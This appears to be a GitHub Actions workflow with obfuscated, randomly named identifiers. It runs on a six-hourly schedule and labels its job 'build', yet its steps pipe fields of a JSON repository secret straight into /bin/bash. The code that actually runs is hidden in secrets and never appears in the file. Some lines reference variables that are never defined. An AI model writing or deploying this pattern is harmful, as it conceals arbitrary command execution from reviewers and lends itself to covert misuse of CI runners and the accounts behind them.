name: hechenmo6745

on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hechenmo6745
        env:
          t99: ${{ secrets.t99 }}
        run: |
          echo $t99 | jq -r .bgiyw62 | /bin/bash
          echo $pcl17 | jq -r .csrf03 | /bin/bash
          echo $llw2 | jq -r .po754 | /bin/bash
          echo $skq78053 | jq -r .sram16 | /bin/bash

